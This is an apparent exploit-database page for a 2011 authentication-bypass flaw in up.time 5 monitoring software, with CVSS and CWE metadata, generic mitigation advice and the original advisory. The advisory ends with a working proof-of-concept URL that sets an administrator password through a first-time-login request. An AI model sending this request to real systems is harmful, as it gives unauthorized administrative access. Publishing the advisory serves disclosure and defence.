header-logo
Suggest Exploit
vendor:
up.time
by:
Unknown
5.5
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: up.time
Affected Version From: up.time 5
Affected Version To: up.time 5 (potentially other versions)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

up.time software remote authentication-bypass vulnerability

Attackers can exploit this issue to bypass authentication and perform unauthorized actions.

Mitigation:

Ensure that the software is up to date with the latest patches and versions. Implement strong passwords and multi-factor authentication to mitigate the risk of unauthorized access.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47599/info

up.time software is prone to a remote authentication-bypass vulnerability.

Attackers can exploit this issue to bypass authentication and perform unauthorized actions.

up.time 5 is vulnerable; other versions may also be affected.

http://www.example.com:9999/index.php?userid=admin
&firstTimeLogin=True
&password=admin
&confirmPassword=admin
&adminEmail=admin () admin
&monitorEmail=admin () admin